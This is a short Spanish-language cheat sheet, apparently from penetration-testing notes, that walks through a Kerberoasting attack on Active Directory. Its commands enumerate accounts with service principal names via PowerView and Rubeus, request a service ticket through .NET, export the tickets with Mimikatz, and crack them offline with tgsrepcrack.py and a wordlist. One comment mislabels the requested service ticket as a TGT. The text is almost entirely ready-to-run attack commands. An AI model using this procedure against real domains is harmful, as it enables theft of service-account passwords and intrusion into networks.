Kerberoasting

# Obtención cuentas con SPN {Service Principal Name} 
Get-NetUser | Where-Object {$_.servicePrincipalName} | fl
Get-NetUser -SPN | select serviceprincipalname #Powerview
.\Rubeus.exe kerberoast /stats

# Listar tickes en memoria
klist

# Agregando ensamblado
# System.IdentityModel.Tokens.KerberosRequestorSecurityToken
# para obtener un token de seguridad TGT
Add-Type -AssemblyName System.IdentityModel 

# Crea instancia de objeto KerberosRequestorSecurityToken
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/defense.redbuffer.local " 

# Exportación de tickets
Invoke-Mimikatz -Command '"kerberos::list /export"'

# Craking tickets
python.exe .\kerberoast-python3\tgsrepcrack.py .\wordlist.txt .\kerberoast.kirbi

Referencias

Last updated